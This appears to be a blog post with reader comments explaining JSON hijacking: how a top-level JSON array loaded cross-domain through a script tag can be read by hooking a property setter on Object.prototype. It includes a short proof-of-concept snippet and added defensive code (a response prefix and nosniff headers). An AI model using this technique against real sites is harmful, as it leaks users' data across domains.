A web application is sending data in this format:
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
This is valid JSON. Before moving on, let's understand an important concept. JavaScript code comes in two forms:
1. JavaScript expression
2. JavaScript statement
JavaScript expressions are not executed by the JavaScript parser when they appear on their own, but statements are.
For example:
<script>
{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}
</script>
This will not be executed, that is, no objects will be created. The above example is a JavaScript expression.
But when it is converted into a statement, as given below:
<script>
[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]
</script>
this gets executed.
The way to exploit this is by declaring a setter for one of the properties, for example "t":
<script>
Object.prototype.__defineSetter__("t", function(obj) { alert(1); for (var i in obj) { alert(i + '=' + obj[i]); } });
</script>
<script defer="defer" src="http://XXX.XXX.XXX.X/main"></script> <!-- this points to the JSON -->
Until now there is no known way of exploiting a JavaScript expression based JSON.
Another restriction on JSON based exploitation is that not many browsers support setters (__defineSetter__).
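To make the expression-versus-statement distinction concrete, here is an added example (not code from the original post). It compiles a response body with the Function constructor, which parses but does not run the code, to see whether that body would execute if it were loaded through a <script> tag, and it shows the usual mitigation: prefixing every JSON response with something that is a syntax error as JavaScript, which a same-origin client strips before calling JSON.parse. The ")]}'," prefix and the helper names are assumptions; the sample bodies are constructed from the record used in the post.

```javascript
// Added example, not from the original post. Checks whether a JSON body
// would parse as a JavaScript program when included via <script src=...>,
// and demonstrates the unparseable-prefix mitigation.

// A top-level object literal is parsed as a block statement, and the
// quoted "key": form inside a block is a syntax error, so nothing runs.
// A top-level array literal is an expression statement and does run.
function parsesAsScript(body) {
  try {
    new Function(body); // compiles only; never executes the body
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Server side: prefix every JSON response so that a <script> include
// fails to parse before any array or object literal is evaluated.
// (Assumed prefix; the post does not name one.)
const JSON_PREFIX = ")]}',\n";

function wrapJsonResponse(obj) {
  return JSON_PREFIX + JSON.stringify(obj);
}

// Client side (same origin, fetched with XHR/fetch, not <script>):
// verify and strip the prefix, then parse strictly with JSON.parse.
function parseWrappedJson(body) {
  if (!body.startsWith(JSON_PREFIX)) {
    throw new Error("missing anti-hijacking prefix");
  }
  return JSON.parse(body.slice(JSON_PREFIX.length));
}

// Constructed sample bodies: the record from the post as a top-level
// object and wrapped in a top-level array.
const objectBody =
  '{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}';
const arrayBody = "[" + objectBody + "]";

// Object form: syntax error as a script. Array form: runnable statement.
// Wrapped form: syntax error again, but still parseable by the client.
function demo() {
  const wrapped = wrapJsonResponse(JSON.parse(arrayBody));
  return {
    objectRunsAsScript: parsesAsScript(objectBody),   // false
    arrayRunsAsScript: parsesAsScript(arrayBody),     // true
    wrappedRunsAsScript: parsesAsScript(wrapped),     // false
    roundTripT: parseWrappedJson(wrapped)[0].t,       // 1
  };
}
```

Two practical notes on the design. First, the prefix defends the array form regardless of whether the browser honours setters on Object.prototype; since ES5, object and array literals define their own properties directly instead of assigning through inherited setters, so the __defineSetter__ trick above no longer fires in current engines, but a JSON response that is a syntax error as a script is safe against any script-inclusion variant. Second, serving the response with Content-Type: application/json together with X-Content-Type-Options: nosniff makes browsers refuse to execute it as a script at all, which is the cheaper check to deploy alongside the prefix.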

6 comments:
It's "JSON", not "jason" ... JavaScript Object Notation.
@ Anonymous: Sorry, it was a typo! Thanks for noticing, I rectified it.
The vulnerability does not look like XSS, it is data leakage, the example shown extracts data from JS object from different domain. The title is misleading.
Are you going to change the heading? It is not XSS.
I agree with the above comment; the author should correct it or explain what he means by this.
The setter does not work with Firefox. Is there any specific browser you tried this in? Can you provide any links where this function is better explained?